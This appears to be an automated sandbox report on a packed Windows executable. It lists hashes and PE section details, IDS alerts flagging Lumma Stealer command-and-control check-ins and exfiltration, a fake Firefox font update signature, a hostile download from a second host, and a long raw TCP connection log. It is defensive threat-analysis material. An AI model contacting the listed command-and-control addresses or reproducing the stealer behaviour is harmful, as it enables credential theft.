                                                                                                                                                                                                SHA512:593c95647b49823e14a4730c21cdfc04a40c4efa47b8ce1f37b4efbae6d2acbb2a9b921a513d7790b033310a1b29e70a27a6c9b639dd44a978ee69176af437cf
                                                                                                                                                                                                SSDEEP:49152:7G1w+9M9sXHSiBf6lMu9qkpAFWL29HbdIF/K9spg:mV9MiXyeHu9q4AFWC9HAKN
                                                                                                                                                                                                TLSH:368533E052917C36D99163FA0ECF5E20FD9406AD8F47A307EF9282DA18970D76E52CC9
                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................J...........@.................................\...p..
                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                Entrypoint:0x89d000
                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                jmp 00007FC7B861923Ah
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                0x10000x560000x26200ab403f7e17c6239e539f40b9d93bc5f7False0.9993212090163934data7.986813169938198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x570000x2b00x200619b255782d9f94ae182668e79e72e45False0.796875data6.007587603566362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                0x590000x2a50000x200edf86b6a02aee61f8e57875dd2b8005cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                qhnzubsn0x2fe0000x19e0000x19d400f4895fdd54a58dcf6d3a7e0877cc461fFalse0.9940419644207501data7.954121203332598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                ddtvewwi0x49c0000x10000x400484831dc64789e4a55f1c5629657848eFalse0.7685546875data5.997275968676129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .taggant0x49d0000x30000x2200f9346c711406fd9b763d412f356b3841False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                RT_MANIFEST0x49b1440x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                kernel32.dlllstrcpy
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-11-23T16:53:04.718283+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:05.401769+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:05.401769+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:06.872986+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:07.601410+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:07.601410+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:09.717644+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:12.201167+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:13.063664+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:14.732904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:17.244324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:19.660969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:26.015972+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:26.634848+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742172.67.162.84443TCP
                                                                                                                                                                                                2024-11-23T16:53:28.208865+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449744185.215.113.1680TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 23, 2024 16:53:03.408165932 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:03.408248901 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:03.408335924 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:03.412184954 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:03.412229061 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:03.850024939 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                Nov 23, 2024 16:53:04.717994928 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:04.718282938 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:04.722521067 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:04.722553015 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:04.722969055 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:04.772001982 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:04.790337086 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:04.790374041 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:04.790550947 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:05.401782990 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:05.401901007 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:05.401957989 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:05.405148983 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:05.405184031 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:05.605746031 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:05.605830908 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:05.605909109 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:05.606451035 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:05.606492996 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:06.872797012 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:06.872986078 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:06.874214888 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:06.874236107 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:06.874574900 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:06.875936985 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:06.875936985 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:06.876034021 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601423025 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601481915 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601536036 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601578951 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601618052 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601644039 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601644039 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601674080 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.601757050 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.603964090 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.604161978 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.604212046 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.604222059 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.618972063 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.619066000 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.619085073 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.619098902 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.619159937 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.726052046 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.771919966 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.802432060 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806169033 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806263924 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806265116 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806344986 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806441069 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806472063 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806489944 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:07.806497097 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:08.408452034 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:08.408551931 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:08.408639908 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:08.409157991 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:08.409198046 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:09.717521906 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:09.717643976 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:09.719526052 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:09.719559908 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:09.719793081 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:09.721560955 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:09.721775055 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:09.721822023 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:09.721940041 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:09.721956015 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:10.784967899 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:10.785079002 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:10.785168886 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:10.785415888 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:10.785464048 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:10.942955017 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:10.943069935 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:10.943166018 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:10.944197893 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:10.944235086 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:12.200952053 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:12.201167107 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:12.202812910 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:12.202843904 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:12.203108072 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:12.204838037 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:12.205025911 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:12.205082893 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:13.063683033 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:13.063795090 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:13.063934088 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:13.064143896 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:13.064205885 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:13.467365026 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:13.467454910 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:13.467560053 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:13.467978954 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:13.468018055 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:14.732745886 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:14.732903957 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:14.736183882 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:14.736211061 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:14.736493111 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:14.737760067 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:14.737915993 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:14.737960100 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:14.738034010 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:14.738050938 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:15.611751080 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:15.611881018 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:15.611963034 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:15.612112999 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:15.612157106 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:15.936496973 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:15.936594009 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:15.936842918 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:15.937165022 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:15.937216043 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:16.819772959 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:16.819839001 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:16.820076942 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:16.822338104 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:16.822377920 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.244240046 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.244323969 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.246228933 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.246273041 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.246510029 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.248379946 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.248555899 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.248575926 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.847875118 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.847994089 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:17.848218918 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.848305941 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:17.848323107 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.343879938 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:18.343961954 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.344300985 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:18.344558954 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:18.344593048 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.714565039 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.714682102 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:18.717593908 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:18.717627048 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.717972994 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:18.771931887 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:19.660861015 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.660969019 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.662259102 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.662288904 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.662630081 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.676178932 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.676995039 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677042007 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677159071 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677203894 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677337885 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677375078 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677521944 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677556992 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677745104 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677782059 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.677963018 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.678004980 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.678025007 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.678208113 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.678265095 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.719356060 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.719558954 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.719640970 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.719667912 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.763350964 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.763681889 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.763750076 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.763824940 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.807339907 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:19.807501078 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:19.851352930 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:20.277714014 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:20.410737991 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:20.451365948 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:20.631846905 CET804972384.201.211.39192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:20.631994009 CET4972380192.168.2.484.201.211.39
                                                                                                                                                                                                Nov 23, 2024 16:53:20.632193089 CET4972380192.168.2.484.201.211.39
                                                                                                                                                                                                Nov 23, 2024 16:53:20.751830101 CET804972384.201.211.39192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163721085 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163800001 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163820982 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163860083 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163880110 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.163897038 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164002895 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164002895 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164004087 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164004087 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164077997 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.164148092 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.185026884 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.185101032 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:21.185117006 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:21.185147047 CET443497364.175.87.197192.168.2.4
